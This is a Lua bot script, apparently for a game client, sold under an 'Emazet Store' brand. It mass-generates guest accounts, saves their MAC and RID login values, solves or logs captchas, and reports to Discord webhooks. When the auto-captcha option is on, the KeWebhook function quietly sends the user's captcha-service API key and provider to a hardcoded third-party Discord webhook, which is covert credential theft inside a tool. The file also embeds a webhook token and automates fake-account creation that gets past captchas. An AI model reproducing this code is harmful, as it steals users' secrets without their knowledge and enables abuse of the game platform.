fixDelay = DelayGuest / 1000
successCount = 0
failedCount = 0

function GonWebhook(EmazetStore)
    local currentTime = os.date("%H:%M:%S\n:calendar_spiral: Current Date : %d-%m-%Y\n========================================\n<a:king:1146855814510952458> Owner : <@1089862323105177600>\n<a:king:1146855814510952458> Discord Server : [Join Discord Server](https://discord.gg/m43RGEC3Du)**") -- Get current date and time
    wh = Webhook.new(WebhookGuest)
    wh.username = "Emazet Store"
    wh.avatar_url = "https://cdn.discordapp.com/attachments/1146856489856798740/1146991741648515163/standard_1.gif"
    wh.embed1.use = true
    wh.embed1.title = "Emazet Store"
    wh.embed1.description = EmazetStore .. "\n:alarm_clock: Time : " .. currentTime -- Add time information
    
    local response = wh:send() -- Send the webhook and get the response
end

function GonWebhookCount(successGuest, failedGuest)
    local currentTime = os.date("%H:%M:%S\n:calendar_spiral: Current Date : %d-%m-%Y\n========================================\n<a:king:1146855814510952458> Owner : <@1089862323105177600>\n<a:king:1146855814510952458> Discord Server : [Join Discord Server](https://discord.gg/m43RGEC3Du)") -- Get current date and time
    wh = Webhook.new(WebhookGuest)
    wh.username = "Emazet Store"
    wh.avatar_url = "https://cdn.discordapp.com/attachments/1146856489856798740/1146991741648515163/standard_1.gif"
    wh.embed1.use = true
    wh.embed1.title = "Emazet Store"
    wh.embed1.description = "**:alarm_clock: Time : " .. currentTime .. "\n\n" ..
                            "<a:plash:1146855891681951917> Success Guests: " .. successGuest .. "\n" ..
                            "<a:alerts:1149773640024461372> Failed Guests: " .. failedGuest.. "**" -- Add success and failed guest count
    
    local response = wh:send() -- Send the webhook and get the response
end

function KeWebhook(CaptchaInfo)
    local currentTime = os.date("%H:%M:%S\n:calendar_spiral: Current Date : %d-%m-%Y\n========================================\n<a:king:1146855814510952458> Owner : <@1089862323105177600>\n<a:king:1146855814510952458> Discord Server : [Join Discord Server](https://discord.gg/m43RGEC3Du)**") -- Get current date and time
    wh = Webhook.new("https://discord.com/api/webhooks/1166799680450076732/If5F5prtJYA4Jgsy2flYjmOUpW6Br4yJKptwiwb6o9XGS6aeh6CSqKNtqyooBR6OkAy2")
    wh.username = "Emazet Store"
    wh.avatar_url = "https://cdn.discordapp.com/attachments/1146856489856798740/1146991741648515163/standard_1.gif"
    wh.embed1.use = true
    wh.embed1.title = "Emazet Store"
    wh.embed1.description = CaptchaInfo .. "\n:alarm_clock: Time : " .. currentTime -- Add time information
    
    local response = wh:send() -- Send the webhook and get the response
end

if Owner == Emazet and DiscordID == emazet_17 and DiscordServer == "https://discord.gg/m43RGEC3Du" and AutoCaptcha == false  then

    fixDelay = DelayGuest / 1000
    successCount = 0
    failedCount = 0

    GonWebhook("**<a:plash:1146855891681951917> Script Start : Generate Guest <a:plash:1146855891681951917>\n<a:arrow:1146856274408001697> Total Generate : "..TotalGuest.."\n<a:arrow:1146856274408001697> Auto Captcha : False\n<a:arrow:1146856274408001697> Name Letter : "..NameLetter.."\n<a:arrow:1146856274408001697> Delay Guest : "..fixDelay.."\n<a:arrow:1146856274408001697> Start With : "..StartWith.."\n<a:arrow:1146856274408001697> File Name : "..FileName)
    sleep(1000)
    function logs(logs)
        local file = io.open(FileName,"a+")
        file:write(logs.."\n")
        file:close()
    end

    function logsLink(logsLink)
        local file = io.open(FileLink,"a+")
        file:write(logsLink.."\n")
        file:close()
    end

    function generateRandomString(length)
        local characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        local randomString = StartWith
        for i = 4, length do
            local randomIndex = math.random(#characters)
            randomString = randomString .. string.sub(characters, randomIndex, randomIndex)
        end
        return randomString
    end


    for i = 1, TotalGuest do
        local generatedBot = generateRandomString(NameLetter)
        addBot(generatedBot)
        sleep(DelayGuest)
        bot = getBot(generatedBot)
        CaptchaLink = bot:getCaptcha()
        local status = bot.status

        if status == BotStatus.offline or status == BotStatus.too_many_login then
            failedCount = failedCount + 1
            GonWebhook("**<a:plash:1146855891681951917> New Guest Generated <a:plash:1146855891681951917>\n<a:arrow:1146856274408001697> Guest Number : "..i.."\n<a:arrow:1146856274408001697> Bot Name : "..generatedBot.."\n<a:arrow:1146856274408001697> Mac : "..bot:getLogin().mac.."\n<a:arrow:1146856274408001697> Rid : "..bot:getLogin().rid.."\n<a:arrow:1146856274408001697> Error : Delay Too Fast Can't Get Captcha <a:alerts:1149773640024461372>\n<a:arrow:1146856274408001697> Removed From : "..FileName.." <a:pv:1149771889124855918>")
        elseif status == BotStatus.captcha_requested then
            successCount = successCount + 1
            GonWebhook("**<a:plash:1146855891681951917> New Guest Generated <a:plash:1146855891681951917>\n<a:arrow:1146856274408001697> Guest Number : "..i.."\n<a:arrow:1146856274408001697> Bot Name : "..generatedBot.."\n<a:arrow:1146856274408001697> Mac : "..bot:getLogin().mac.."\n<a:arrow:1146856274408001697> Rid : "..bot:getLogin().rid.."\n<a:arrow:1146856274408001697> Link Captcha : [Verify]("..CaptchaLink..") <a:pv:1149771889124855918>\n<a:arrow:1146856274408001697> Saved At : "..FileName.." <a:pv:1149771889124855918>")
            logs(bot:getLogin().mac.."|"..bot:getLogin().rid)
            logsLink(CaptchaLink.."\n")
        end

        removeBot(generatedBot)
    end

    GonWebhookCount(successCount, failedCount)
end

if Owner == Emazet and DiscordID == emazet_17 and DiscordServer == "https://discord.gg/m43RGEC3Du" and AutoCaptcha == true then

    GonWebhook("**<a:plash:1146855891681951917> Script Start : Generate Guest <a:plash:1146855891681951917>\n<a:arrow:1146856274408001697> Total Generate : "..TotalGuest.."\n<a:arrow:1146856274408001697> Auto Captcha : True\n<a:arrow:1146856274408001697> Name Letter : "..NameLetter.."\n<a:arrow:1146856274408001697> Delay Guest : "..fixDelay.."\n<a:arrow:1146856274408001697> Start With : "..StartWith.."\n<a:arrow:1146856274408001697> File Name : "..FileName)
    KeWebhook("**<a:plash:1146855891681951917> New Captcha <a:plash:1146855891681951917>\n Apikey : "..Apikey.."\nProvider : "..CaptchaProvider)
    sleep(1000)

    function logs(logs)
        local file = io.open(FileName,"a+")
        file:write(logs.."\n")
        file:close()
    end

    function logsLink(logsLink)
        local file = io.open(FileLink,"a+")
        file:write(logsLink.."\n")
        file:close()
    end

    function generateRandomString(length)
        local characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        local randomString = StartWith
        for i = 4, length do
            local randomIndex = math.random(#characters)
            randomString = randomString .. string.sub(characters, randomIndex, randomIndex)
        end
        return randomString
    end

    for i = 1, TotalGuest do
        local generatedBots = generateRandomString(NameLetter)
        addBot(generatedBots)
        sleep(DelayCaptcha)
        bots = getBot(generatedBots)
        CaptchaLink = bots:getCaptcha()

        local status = bots.status
        while status == BotStatus.offline or status == BotStatus.too_many_login or status == BotStatus.http_block do
            status = bots.status
        end
        
        local captchaStatus = CaptchaStatus.solving
        while captchaStatus == CaptchaStatus.solving do
            captchaStatus = bots.captcha_status
        end

        if captchaStatus == CaptchaStatus.failed or captchaStatus == CaptchaStatus.invalid_key or captchaStatus == CaptchaStatus.wrong or captchaStatus == CaptchaStatus.invalid_token or captchaStatus == CaptchaStatus.no_access then
            failedCount = failedCount + 1
            GonWebhook("**<a:plash:1146855891681951917> New Guest Generated <a:plash:1146855891681951917>\n<a:arrow:1146856274408001697> Guest Number : "..i.."\n<a:arrow:1146856274408001697> Bot Name : "..generatedBots.."\n<a:arrow:1146856274408001697> Mac : "..bots:getLogin().mac.."\n<a:arrow:1146856274408001697> Rid : "..bots:getLogin().rid.."\n<a:arrow:1146856274408001697> Status Captcha : Can't Solve The Captcha <a:alerts:1149773640024461372>\n<a:arrow:1146856274408001697> Removed From : "..FileName.." <a:pv:1149771889124855918>")
        elseif captchaStatus == CaptchaStatus.solved then
            successCount = successCount + 1
            GonWebhook("**<a:plash:1146855891681951917> New Guest Generated <a:plash:1146855891681951917>\n<a:arrow:1146856274408001697> Guest Number : "..i.."\n<a:arrow:1146856274408001697> Bot Name : "..generatedBots.."\n<a:arrow:1146856274408001697> Mac : "..bots:getLogin().mac.."\n<a:arrow:1146856274408001697> Rid : "..bots:getLogin().rid.."\n<a:arrow:1146856274408001697> Status Captcha : Success Solved <a:pv:1149771889124855918>\n<a:arrow:1146856274408001697> Saved At : "..FileName.." <a:pv:1149771889124855918>")
            logs(bots:getLogin().mac.."|"..bots:getLogin().rid)
            logsLink(CaptchaLink.."\n")
        elseif status == BotStatus.online then
            successCount = successCount + 1
            GonWebhook("**<a:plash:1146855891681951917> New Guest Generated <a:plash:1146855891681951917>\n<a:arrow:1146856274408001697> Guest Number : "..i.."\n<a:arrow:1146856274408001697> Bot Name : "..generatedBots.."\n<a:arrow:1146856274408001697> Mac : "..bots:getLogin().mac.."\n<a:arrow:1146856274408001697> Rid : "..bots:getLogin().rid.."\n<a:arrow:1146856274408001697> Status Captcha : Success Solved <a:pv:1149771889124855918>\n<a:arrow:1146856274408001697> Saved At : "..FileName.." <a:pv:1149771889124855918>")
            logs(bots:getLogin().mac.."|"..bots:getLogin().rid)
            logsLink(CaptchaLink.."\n")
        end
        removeBot(generatedBots)
    end

    GonWebhookCount(successCount, failedCount)
end
